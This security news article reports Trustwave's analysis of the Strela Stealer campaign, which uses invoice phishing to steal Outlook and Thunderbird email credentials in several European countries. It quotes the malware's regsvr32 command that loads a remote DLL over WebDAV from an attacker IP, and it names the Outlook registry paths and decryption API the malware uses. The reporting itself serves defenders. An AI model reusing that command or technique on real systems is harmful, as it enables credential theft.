Cybersecurity researchers at Trustwave have discovered a sophisticated malware campaign targeting Microsoft Outlook users to steal their login credentials.
The Strela Stealer, named after the Russian word for “Arrow,” has been actively targeting systems since late 2022, with a precise focus on exfiltrating email credentials from both Microsoft Outlook and Mozilla Thunderbird email clients.
The threat primarily affects users in specific European countries, including Spain, Italy, Germany, Poland, and Ukraine.
.png
)
Strela Stealer is delivered through targeted phishing campaigns that have evolved over time.
Recent attacks involve forwarding legitimate emails containing invoices, but replacing the original attachments with ZIP archives containing the malware loader.
The emails are crafted in the target country’s language, appearing as legitimate invoice notifications for recent product purchases.
Technical analysis reveals that Strela Stealer employs sophisticated techniques to evade detection.
Trustwave researchers noted that the malware implements a multi-stage infection process with custom multi-layer obfuscation and code-flow flattening to complicate analysis.
.webp)
The execution chain begins with a ZIP archive containing a JScript file that, when executed, delivers subsequent payload stages.
The initial stage of the attack involves a heavily obfuscated JScript file that verifies if the target system is located in one of the targeted countries by checking the system’s locale identifier (LCID).
.webp)
The script queries the Windows registry key “Control Panel\International\Locale” and compares it against predefined values for German-speaking countries.
Technical Execution Process
Once the target’s geographic location is verified, the script proceeds to download and execute additional components from a command and control server using WebDAV protocol.
The command “cmd /c regsvr32 /s \\193.143[.]1.205@8888\davwwwroot\1909835116765[.]dLL” reveals how the malware loads its second stage directly into memory without saving it to disk, a technique designed to evade detection by traditional antivirus solutions.
The final stage of Strela Stealer focuses specifically on stealing Microsoft Outlook credentials.
The malware searches the Windows registry for Outlook profile data, specifically targeting keys such as “HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676” where email configuration is stored.
When these keys are located, the malware reads the “IMAP User,” “IMAP Server,” and “IMAP Password” values, decrypting protected data using the CryptUnprotectData API function.
.webp)
The malware verifies system locale before proceeding with data exfiltration, using a complex bit-checking routine that ensures it only activates on targeted systems.
The stolen credentials and system information are then transmitted to the attacker’s server using HTTP POST requests, allowing the threat actors to gain unauthorized access to victims’ email accounts.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
